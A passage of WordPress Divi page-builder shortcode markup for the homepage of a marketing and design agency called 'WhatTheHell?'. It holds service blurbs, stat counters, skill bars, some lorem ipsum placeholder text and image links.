button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row 